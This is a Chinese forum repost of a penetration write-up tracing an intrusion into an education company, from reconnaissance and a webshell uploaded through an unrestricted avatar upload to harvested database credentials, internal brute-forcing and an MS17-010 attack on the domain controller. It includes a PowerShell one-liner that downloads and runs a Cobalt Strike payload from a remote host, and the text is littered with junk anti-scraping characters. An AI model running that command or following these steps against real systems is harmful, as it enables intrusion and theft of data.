找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2453|回复: 0
打印 上一主题 下一主题

渗透实战 | 从外网直接打到内网全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2024-3-1 19:41:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

2 i! ^- O& |% l1 t2 b 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路 . `" u* _* q" @( X

4 ]( m" W; L# @, N( j5 C

* ~+ k2 E1 E' j1 R9 s   * H+ n# s( p8 u8 w( y

9 m7 @* u! H" O5 H! J/ I: U8 P% H: R

" B+ g+ ]: C7 Z5 b9 K- W- v9 a 正文 ; K7 d. M( g1 }! n8 \3 o

4 {4 z! a( _) U7 K

3 |1 K& B1 g4 p; o {5 g+ R* |   $ _/ W- g. K$ Q+ e2 e0 L: \

& g' @& f% I& u" f0 S" O3 l' U( |2 ]& X

9 }& `; K0 f# A 目标:www.xxxx.com(一家教育机构)
- q; p: w& ?2 C
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
0 M! _2 b7 I0 I r3 z( y' B# `

) P5 e) o" {4 G. h; j0 O

; X7 b P8 B0 M vshapes= + {6 P! Q* Z% s' f2 n% t H6 w

5 e4 s7 ?) Q7 z6 v T$ T% ~! d

$ Z$ ]! J& w$ a2 ?2 T 进行了简单的信息搜集
' i! [% V5 l; m
/ s& ^4 N5 I% j
6 I X5 h! |" ]3 |1 |, b" x

: R! Q8 v# n3 A7 S/ @4 \

3 v' S8 ]% }3 [. R! C% \& h 子域名搜集% k7 M0 W# B. A! T( a5 n6 O% x# b

$ j1 u" N+ O* q1 w, @: j6 }. |

3 h0 X5 k5 C* I. @; g! l* g vshapes=7 v, ` [1 q3 |3 [! Z

! Q; D9 d: L/ F, ^6 ]: O$ O

5 ]; C) w' z+ \- i; K* Q3 M7 G fofa找资产
; z* V# H; V- \% D
' C8 J, x8 A& R8 \
) |( I0 ?4 _# u: n6 @# R2 I

' m; ?6 S% n4 ]& Y

! w- w6 N9 a0 E# I/ t. r vshapes=/ m T2 k9 c/ o) c7 ]# R7 X9 i5 s

9 G: U. Y+ t; ~, i9 D

5 w, X2 D0 [! B' p% E3 l 一共七个资产。去重之后只有两个。
& _: D" M- Y* l% h5 N. R3 I
: X* I7 w& r- b( X9 T8 d6 H
' _% S+ m8 P4 y6 ^; N9 o6 x

E" Y0 y6 p8 y/ o

g( H g) B7 s3 ?: a9 c 目录探测 ' n1 N* B4 z5 m- S

, Y8 p0 \# K* D/ K, f0 }7 s

$ _, R% w2 V2 M. P vshapes=5 b$ j: J' ~& ]( O' `: q( ?2 |

3 t5 L' W( |0 \% F# h

( |1 ]: I& a$ e% l* ^! Z" k 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
' f0 }8 c$ r2 e
9 m- i z9 n; @, G/ R5 O; m, C3 X
, z1 @& m; a4 P- _# i

+ t4 P- [+ o) X: Q. J

4 }/ Q8 X$ P* p; z0 Q& K* ^4 A 我又尝试了通过修改返回包来绕过登录界面 2 }, U$ y0 X. C# M. D

& l5 y9 I2 w. w( O+ e/ ^, {( t

S3 Y" W2 I3 L- ?% B Y vshapes=0 R/ ?3 S6 V( U$ H

) Q; A0 `$ P4 F" Z, ~

j/ R* }% _& |, P 还是不行,尝试注入无果 # G/ H% N5 o6 A2 b: [

+ g9 p% e* k- w" Y7 N

7 w/ X4 h! e1 l) A' u8 a$ W5 |6 S# \ vshapes=# u, H$ \9 z# S0 J: `1 p# X

8 A& }0 Q) h" ?/ L$ j. ^

% h3 d2 ?" N2 |* ]6 i6 X9 g [' \ 不过我目录探测出了一处Spring信息泄露
9 s/ n' A1 i5 `0 Q1 E5 F
& j; B+ d& u7 J9 R" f' V
" `# B4 F* a( a! g% H# t$ S+ Y

1 Z7 ^, s, ]2 {! s

1 }# E# z: {, ?% y- \" [ vshapes=# Y! i' V# _4 C& |3 ?5 S& \

$ d: B# \ t8 R8 V

# Y2 `! t/ b0 b) w' W/ c: ^, p 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录, N, q1 G; |" \$ K6 W

% a5 Z# f6 O! q" ]0 f4 s- v) Q

" e4 y' z6 T# p/ U0 |# x( [+ B vshapes=8 r4 K) v3 |/ H4 z9 N: P! D+ ^& f

+ |$ y3 h9 c# r' C

# P8 E, I) T" \' { 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。 [( M' m3 @: D

4 a( N2 g( I; \; b) L: {$ U# x9 ~

. L6 |5 Q" Y/ z+ h vshapes=4 Y- C$ @6 k" O' c# P

5 b9 F0 P* K' Z4 \4 P' n

/ A N) P3 C0 p/ w4 H: B/ h' x 获取有些师傅到这一步就手机抓包电脑测了。! v y+ f2 M0 @' e0 u

7 s: e# ~5 u7 q

3 M& V* y" F0 e6 Q# B4 Z Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。 ( n9 [# U! V: L) s' m4 L0 C

- H/ q4 F _! S

' k) ?# k9 E9 R4 G 其中在一个公众号发现了小程序,可以进行注册。 5 K1 z2 i( ?) |! d: q

3 Y. J' |+ E1 k% T3 y/ s( c; o

2 R6 O+ g! t! t2 L8 ~' G2 j 看到了头像上传,尝试上传获取WebShell ) D' P) ^1 D5 a. l- a4 c! o* W" P( x

1 }3 b3 s% C# k. p8 F2 g

0 {3 G9 S4 T5 S {$ C Z5 B vshapes=) T8 i( j) H3 _$ p

- j D! y- L! p9 B& E0 T

# T9 _& X+ c& C; `1 ] 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问 % m' p* m, E- I$ u3 J/ B- ~

3 u& ?7 z# r( r; p b& Q

4 p0 H! {+ y# C/ n$ h! @/ N vshapes= 0 ?- ?7 G9 k* i

6 c# `4 A8 M3 J2 S$ L y5 _

8 }5 {( I) I# a# u* @% V" U1 X. J 然后上了大马$ F" X+ D5 x0 p3 y+ e& U. o! ^: w

/ v' r: @+ d; K; a5 o1 M. Z6 o

( w- }& V! H8 x vshapes= % a% k3 q! X7 Z" ~& i- t8 e

; K) `; h2 h/ r/ d

, C$ F7 d T, Z" G7 C( t9 \; y vshapes= 9 j: F, }+ S+ f2 F4 O1 k

B* r" v7 W$ I+ L) c4 e! m; p

* |" Z- ^" W# b. p; m 通过翻找文件发现数据库账号密码 4 }' t/ Y2 [) N& |# C ^& ~

. H% O( n! J0 H/ @( l- W( U4 d

' N8 S" t2 q. f ]+ n. j vshapes=. t9 [' b5 ], h0 z' F( ]; M

5 v$ r+ ^5 j" h; X

, d0 `" J; c( Q% Z --内网渗透 * p0 Z8 ], K! C. P2 b

: y6 q# t/ P8 g5 r2 T5 u0 D' B8 B

; c: u- V. v8 V8 z8 o# [) R: n 直接通过powershell执行 cs上线& g/ l# R; j2 v9 x# ?9 W* j8 P1 V

! c# K& ~5 p1 }# K1 \+ y

/ l7 {2 Z. L( U+ L1 K2 q powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))" ; v1 [1 p! Z% H* F. C; M' ~# X

3 G- r$ ^$ H7 y5 |+ Q

1 {# W( F' q0 x g, T vshapes=) r$ P, D& }& `9 E5 G$ Y% ^; Z

7 o) \4 O8 c) \$ C* c) j

, S0 y! i% U$ u& E; { 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破 1 J5 c% D! s9 D- S+ e Q

3 G% V, [; v2 M( I* h) o5 q

2 O4 o! I2 G. a5 k+ t vshapes= * f' q& G7 }) H8 A# }6 G7 j

8 D7 `: b' x5 }; V M

; C% s" P; ]$ d$ M 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
/ o5 D$ a. Y9 S$ u
4 f" e9 p1 ]+ x" P( B+ I$ W/ i. E g
. b5 S V+ R/ v" y
; r$ L! M" \1 G( o% |

4 N& w+ M8 i, }6 J% ?

: b( E0 C7 Y/ ]& [1 ` vshapes=5 a7 O( n9 {' K, S V/ t! G

2 E. @& X8 ]& R" P3 A9 p0 ?

9 T* O1 C/ k! i8 D. c 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
, A) W: y( Q6 M' @# `: {& J
: p7 @$ l) C2 `" y7 N" T
, |0 w5 r2 q8 u. Q

2 S; ]8 m5 V5 L$ L! i

0 I3 e- Q( z I vshapes= 8 S( k% Q e7 J4 m% V0 c

3 f# w# c6 v2 L: g/ W

/ B3 m) b0 O. u, L6 a/ ^& E& k& U
+ |/ ]" |% `% Z% ~" @! ?
2 K* B- A+ }$ C+ n# `& f0 o) l1 Y4 I
9 n" }& c3 P7 h$ E/ A

* }4 m# G C/ G) Y' e4 F3 H

9 L- U! a: ] _+ ~' J; h  5 B7 ?2 b7 ] S$ S+ e; X

/ p8 E0 j' F- [1 U

- l j9 {* H7 J& S1 }$ c 小结 ( Y) S4 x) N$ n5 D- a

' j' r! Z. P d2 v# }8 C

8 j8 }4 g) `; F2 I- V4 v: K( Z   J8 U" j& q' U4 G6 E4 i$ U8 o2 Q

7 X F5 U' z& o* X9 d; j

1 S3 @- u" H4 e, K& x. E 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!0 u5 Q0 `( |# a5 Z/ D' ?1 w

6 T; x: M2 d4 r8 t J/ w1 W

+ J& L4 s W. v+ Y0 c  * A, l3 z6 f& K; I4 |

2 {' m* p" [2 s4 b9 n7 |+ n7 v
    ! E2 \0 e& O) A5 a9 ]
  • 3 S; R" M( B( w+ f, X ~1 K( y. p   8 R/ t1 U; W: d
  • - p' I1 b6 q& \" G
  • % z8 m1 i1 ]$ I7 r7 G2 K& J   7 ?2 U+ l2 r; [" i
  • ; `. Z! o& ]. ]1 e5 B
- m, S0 w' ~3 m1 K! j

" L9 O: L4 D" G* Y7 x. p9 \ 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html. s) O# Q J: U" S# i% i

9 {1 ` J! b+ p& X a

9 S' A- Z @# J7 }$ B+ A* _   , i1 x. P2 X% H

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表